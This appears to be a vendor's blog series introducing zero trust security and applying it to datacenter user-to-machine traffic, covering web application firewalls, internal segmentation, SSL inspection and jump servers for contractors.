What is a Zero Trust Philosophy?

Zero Trust: Its a philosophy, not a plan

The Mindset

One of the current trends in IT security that gets a lot of press and discussion is the idea of zero trust.  Zero trust, however, is really a philosophy, not a plan of action.  Specifically, zero trust is the philosophy that all IT resources, whether internal or external, should be treated as untrusted or even potentially compromised.  While this philosophy is simple, applying it to a live environment can be anything but simple!  Adopting a zero trust mindset requires a holistic approach to security and good cooperation between all stakeholders in the organization in order to execute on this philosophy.  This even extends beyond the technology infrastructure and onto the employees and even organizational policies themselves. 

It’s important to keep in mind that the threat landscape is always changing – what may have been good practice five years ago may not be so today. This is what drove us at Crossconnect to develop a series of posts laying out how to adopt a zero trust philosophy in your organization.

Getting Started

This series will explore various aspects of technology infrastructure with an eye towards how things are built when done so with a zero trust mindset.  Before we get into those details, it’s always best to take some time to think about the big picture questions – many of the areas of security that we’ll talk about will have options that range from ‘very simple’ to ‘year-long project.’ Being able to figure out where effort needs to be made will go a long way towards creating an effective security infrastructure for your organization. 

Foundations of Zero Trust Philosophy

The first step in planning is to think about the capabilities of your organization and the threats you’re likely to face.  Many threats are industry or organization specific, but there are some that are universal.  First, of course, is ransomware – probably the biggest general threat most organizations will face.  Fraud and theft also rank high in terms of general threats.  Sometimes, the organization’s data itself is the target – there are plenty of groups out there who want confidential information for any number of reasons, even just to leak to the public.  And finally, compromising your organization may be done so that the bad actors can gain access to a 3rd party’s network via yours – think contractors and other service providers.

Next, look at your internal capabilities.  Security is, unfortunately, time-consuming to manage.  As such, it gets hard to manage some solutions with limited staff and budget.  Consider what your organization is capable of managing and monitoring when looking at security products and services – a simple but well-managed system is going to be more effective than a very capable, yet complex and maintenance-intensive system that gets neglected.

Once you have a good understanding of what your threats and capabilities are, then it’s time to build a plan.  The core of a security plan is to look at the applications in use, files/information that needs access, and the infrastructure that they run on, then figure out who/what needs access.  The goal is to limit access for any device, user, or application to only the resources it needs. 

Zero Trust Philosophy Index

This series will explore the areas of security that need to be addressed in order to make your plan a reality and to discuss specific areas of focus on how to apply a zero trust mindset.  

  • Datacenter
  • Route/switch
    • Features that ensure integrity of network operations
  • Wireless
    • Capabilities for detection and mitigation of RF based attacks
  • Endpoint
    • Network Access Control (NAC) – Ensuring that endpoint activity is controlled and that security threats are detected and mitigated before an exploit can occur
  • Network Security
    • Ensuring that all traffic through the network is controlled and monitored for malicious activity
  • Cloud Security
    • Ensuring that user to cloud access is controlled and that cloud resources are appropriately provisioned and accounted for.
  • The Human Factor
    • Ensuring that end users are aware of security issues and responsible for their security choices.

User to Machine Security

Zero Trust in the Datacenter – Protecting Your Servers from Your Users

For the first part of our explorations of the zero trust philosophy, we’re going to look at the datacenter. 

user to machine security, protecting the datacenter

It’s All in the Flow

When we look at the datacenter we have two types of traffic flows, each of which needs to be looked at from a security perspective.  First is user to machine security.  Protecting one’s datacenter resources from the users has always been a necessity, however the types of threats and what we consider a user have changed a lot over the years.  Second is machine to machine security.  This area of datacenter security is much newer and has historically been challenging and expensive to implement.  We’ll be focusing on user to machine security for now – machine to machine security will be discussed in a future post.

Note: What we discuss here can easily be applied to servers located on-prem, co-located, or even in the public cloud. 

On to User to Machine Security

The primary type of user to machine security is what’s commonly referred to as north-south security, where the focus is on Internet users.  Exposing necessary resources to the Internet is a requirement for obvious reasons, but Internet-based threats are omnipresent and can be of considerable sophistication.  It may seem obvious, but it bears repeating that any security policy should be built with only the necessary access privileges granted.  For Internet-facing users, this is usually easy – modern websites/applications usually just require that HTTP/HTTPS traffic coming in on ports 80 and 443 is allowed.  Legacy applications can complicate this process, though, so always work with the application team to understand all requirements for the application to function and build access policies appropriate to your environment.

Beyond simple access controls, it’s important to also consider what the users are inputting into the application. 

For example, putting malicious information in an HTTP POST request is a very common way of trying to get the application to give up information, grant inappropriate access requests, or otherwise misbehave in a way beneficial to the attacker.  How to abuse application inputs is going to be firmly out of scope for this post – whole books have been written on how to exploit things at the application level.  Addressing this kind of abuse is also more complicated, too.  Port and protocol filtering is really a go/no go type of rule, while inspecting inputs is a lot more complicated due to the much more open nature of user inputs.  There are application best practices for sanitizing user inputs, but especially with proprietary applications, it’s not always possible to do so.  It’s also better to be able to stop malicious traffic before it touches the application.  For this, we most commonly use a web application firewall (WAF). 

What is a WAF?

With a WAF, we can look directly at the payload of interesting packets and filter based on their contents.  For example, a field on a website that’s meant for name input shouldn’t ever have SQL syntax appearing in it.  On the WAF, a rule is created (using lots of regexes!) to ID anything like this and block it. WAFs and similar application specific security tools are, unfortunately, a Very Hard Thing to implement.  The nature of a WAF means that HTTPS traffic needs to be decrypted, which presents challenges in not breaking TLS.  Once that’s been dealt with, building appropriate rules needs close collaboration between the security and application teams to ensure that the WAF is blocking everything it should be, and that rules are updated as applications are updated or as threats emerge.  The infamous log4j vulnerability is one that a good WAF rule can easily block, but building that rule requires good Javascript knowledge and an understanding of how the vulnerability is exploited.  To see what a sample WAF rule blocking log4j exploit attempts looks like, F5 has a ready to go iRule available here

Other Machine to User Security Considerations

The next part of user to machine security is a somewhat newer topic in security – protecting your datacenter resources from your own users.  This is also referred to as internal segmentation.  Historically, trying to firewall your users from your datacenter was difficult, expensive, and of limited value.  Times have changed, and we’re at a point where your users can be as dangerous to the business as an Internet based threat.  Studies done on where attacks gain their initial foothold show that 90% or more attacks begin with a user opening a malicious email or running a bad executable file.  Once run, the malware will begin to crawl the network looking for other vulnerabilities to gain a foothold in the datacenter and then go to work exfiltrating or encrypting data or otherwise disrupting business operations.  With a traditional setup where internal users are considered trustworthy, their traffic is considered good by default and doesn’t warrant being firewalled.  This is not a good stance to have considering the above statistic. 

Callout: Internal segmentation of some variety should be considered a need to have in a modern security-first network design. 

Implementing Internal Segmentation

This is one of those tasks whose complexity is hard to determine.  On the simple end of the spectrum, putting some basic security ACLs in place at the border device between the DC and the users is surprisingly effective for the amount of effort it takes to implement.  Most organizations should be looking at a firewall for this purpose, though.  Modern firewalls will have many more options for inspecting traffic, detecting threats, and alerting IT staff when something is detected.  Some features are actually easier to implement on an internal segmentation firewall, too.  SSL inspection is one of the best examples of this.  Cracking open TLS traffic is a notoriously resource intensive task and if done for Internet-bound traffic, can easily overwhelm a firewall, break websites, or potentially cause HR issues when specific types of user communications are inspected (banking and health information are two major no-nos for deep packet inspection).   SSL inspection, when done between users and the datacenter, has none of these concerns.  Traffic volumes between users and the DC are often well-known and don’t change much, so firewalls can be effectively sized to avoid performance issues.

For user information concerns, interaction with internal resources and data is pretty much open season for whatever security you want to implement – there’s nothing in, say, an employee’s interactions with the organization’s ERP system that would be out of bounds to inspect, log, and audit.

Some Final Considerations

One final thing to consider is how to treat access for 3rd party contractors and how to properly categorize their traffic.  The prevailing wisdom these days is to treat 3rd party contractors as equivalent to Internet-facing users, as several high profile intrusions were launched via a 3rd party with direct access to sensitive resources.  It’s a little more difficult, though – simply just allowing ports 80 and 443 through to a list of servers isn’t enough.  3rd party contractors may need specialized access or just require a large number of permit rules compared to either an employee or Internet user, so close coordination with your 3rd party is required to keep access requirements to a minimum.  Due to the complexity of building network-based security policies suitable for contractors, another option that we’re seeing adopted more lately is deployment of jump servers with enhanced access management software, such as what Bomgar or SecureLink provide.  This type of software provides additional capabilities to the IT staff, such as full session monitoring, access notification, and the ability to only allow logins at specific times or only if explicitly approved by the IT staff.  With this level of control on the jump server, it becomes easier to build other security policies in a much more general way.  Since all users are accessing resources via a jump server, access control rules only have to permit a small number of hosts from known subnets, and detailed application based or port/protocol based rules can often be omitted or reduced in complexity.

Zero Trust Philosophy Index

This series in security philosophy will explore the areas of security that need to be addressed in order to make your plan a reality and to discuss specific areas of focus on how to apply a zero trust mindset.

  • Datacenter
  • Route/switch
    • Features that ensure integrity of network operations
  • Wireless
    • Capabilities for detection and mitigation of RF based attacks
  • Endpoint
    • Network Access Control (NAC) – Ensuring that endpoint activity is controlled and that security threats are detected and mitigated before an exploit can occur
  • Network Security
    • Ensuring that all traffic through the network is controlled and monitored for malicious activity
  • Cloud Security
    • Ensuring that user to cloud access is controlled and that cloud resources are appropriately provisioned and accounted for.
  • The Human Factor
    • Ensuring that end users are aware of security issues and responsible for their security choices.